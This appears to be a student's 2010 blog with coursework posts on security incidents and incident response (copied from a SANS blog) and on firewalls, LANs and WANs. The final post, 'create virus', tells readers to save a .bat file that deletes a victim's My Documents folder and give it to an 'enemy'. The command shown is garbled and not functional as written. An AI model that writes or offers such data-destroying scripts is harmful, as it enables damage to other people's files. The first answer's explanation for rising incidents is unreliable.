Monday, December 13, 2010

1. Why has there been a dramatic increase in the number of computer security incidents in recent years?

ans: There has been a dramatic increase in the number of computer security incidents in recent years because the population is also increasing. It is also because a lot of workers want to finish their work faster, since finishing work faster means earning money faster...


2.What are some characteristics of common computer criminals?

ans.: The common characteristics of common computer criminals are: amateurs, crackers or malicious hackers, criminals, and terrorists.

  

3. What actions must be taken in response to a security incident?

ans.:A great deal of damage has been done to organizational reputations and a great deal of information has been lost in organizations that do not have fully effective incident response programs in place.  Without an incident response plan, an organization may not discover an attack in the first place, or, if the attack is detected, the organization may not follow proper procedures to contain damage, eradicate the attacker’s presence, and recover in a secure fashion.  Thus, the attacker may have far higher impact on the target organization, causing more damage, infecting more systems, and possibly exfiltrating more sensitive data than would otherwise be possible with an effective incident response plan.
If there is an incident and it’s identified as an attack, there are several things that can be done. The worst of course is the “let's close our eyes and maybe it will go away.” This happens more often than not. So with that said there are two ways to approach incident response: Reactive and Proactive. Either is better than nothing, but if you can set your organization up to incorporate both you have a plan that will carry you through the worst situations.
A good reactive plan involves policies and training to identify what requires response, what should be done when an incident is identified, and the best course of action to take.  A good proactive plan puts in place all of the necessary components towards identifying or stopping  potential attacks before they are able to be completed.
Incident response is key when safeguarding data once an incident has occurred. If an incident is identified and personnel identifying it are able to respond appropriately, the ability to safeguard data and recover back to an operational state has increased.  In some cases a properly developed incident response plan can prevent a small incident from becoming a catastrophe.  Incident response is more than a group of people responding to an incident.  A good response team is developed with a strong set of procedures in place to ensure each member knows their role and that the individual who identified the incident also knows the proper reporting procedures.
For any good process to work, management must see the value of having the policies and process. This is a key element towards developing a working response plan.  There are numerous guides and standards that outline response procedures and methods. It is important to know which guidelines your organization falls under and incorporate your own standards that meet or exceed government minimum standards.  A good baseline is the NIST Guidelines.
Once the standards have been identified, ensure that all team members are aware of their roles and responsibilities.  Conduct training to reinforce the policies and incident response roles for both team members and managers. Executive management should be involved in various aspects of the incident response plan to ensure buy-in and support.
Before an incident response can be initiated there must be set policies that identify what actions must be taken for the different types of incidents. Policies and training will ensure that the proper methodology is followed to ensure a successful outcome to the incident.  Policies should be clear and not left for interpretation by members of the organization or contractors.
When an incident occurs, all aspects of training and policy must be followed. This will ensure a positive outcome.   All reports should be based on an organization-wide template to ensure uniformity.
The key element of this process is the reporting and documentation of the incident. The documentation can be useful in identifying shortfalls and high points. Documentation will allow for good audit reviews and process improvements as well as protection from legal repercussions due to an incident.
All reports should be clear and concise; they should contain only factual observations and information. A report should not contain information based on conjecture.

 source:
http://blogs.sans.org/security-leadership/2009/08/18/critical-control-18-incident-response-capability/

Monday, December 6, 2010

It104 aljohn sidayon

Firewall
is a part of a computer system or network that is designed to block unauthorized access while permitting authorized communications. It is a device or set of devices that is configured to permit or deny network transmissions based upon a set of rules and other criteria.
Firewalls can be implemented in either hardware or software, or a combination of both. Firewalls are frequently used to prevent unauthorized Internet users from accessing private networks connected to the Internet, especially intranets. All messages entering or leaving the intranet pass through the firewall, which inspects each message and blocks those that do not meet the specified security criteria.

Several types of firewall techniques:
  1. Packet filter: Packet filtering inspects each packet passing through the network and accepts or rejects it based on user-defined rules. Although difficult to configure, it is fairly effective and mostly transparent to its users. It is susceptible to IP spoofing.
  2. Application gateway: Applies security mechanisms to specific applications, such as FTP and Telnet servers. This is very effective, but can impose a performance degradation.
  3. Circuit-level gateway: Applies security mechanisms when a TCP or UDP connection is established. Once the connection has been made, packets can flow between the hosts without further checking. 
  4. Proxy server: Intercepts all messages entering and leaving the network. The proxy server effectively hides the true network addresses.

LAN (Local Area Network)
supplies networking capability to a group of computers in close proximity to each other such as in an office building, a school, or a home. A LAN is useful for sharing resources like files, printers, games or other applications.

WAN (Wide Area Network)
WANs are used to connect LANs and other types of networks together, so that users and computers in one location can communicate with users and computers in other locations. Many WANs are built for one particular organization and are private. Others, built by Internet service providers, provide connections from an organization's LAN to the Internet. WANs are often built using leased lines. At each end of the leased line, a router connects to the LAN on one side and a hub within the WAN on the other. Leased lines can be very expensive. Instead of using leased lines, WANs can also be built using less costly circuit switching or packet switching methods. Network protocols including TCP/IP deliver transport and addressing functions. Protocols including Packet over SONET/SDH, MPLS, ATM and Frame relay are often used by service providers to deliver the links that are used in WANs. X.25 was an important early WAN protocol, and is often considered to be the "grandfather" of Frame Relay as many of the underlying protocols and functions of X.25 are still in use today (with upgrades) by Frame Relay.
Academic research into wide area networks can be broken down into three areas: Mathematical models, network emulation and network simulation.


source: http://wikipedia.com

Thursday, November 18, 2010

create virus

HERE'S A WAY I FOUND TO DELETE THE MY DOCUMENTS FOLDER OF UR ENEMY OR JUST 4 FUN.
HERE'S WHAT U SHOULD DO.
OPEN NOTEPAD AND COPY-PASTE THE FOLLOWING CODE IN IT.
THEN SAVE THE FILE WITH WHATEVER NAME U LIKE BUT BE SURE TO SAVE IT AS A BAT FILE.
I MEAN SAVE IT LIKE MYVIRUS.BAT. IT SHOULD HAVE THE ENDING AS .BAT.
NOW IF U GIVE THIS TO SOMEONE AND IF HE RUNS THIS PROGRAM THEN HIS MY DOCUMENT FOLDER WILL BE DELETED.
rmdir C documents and Settings SQ.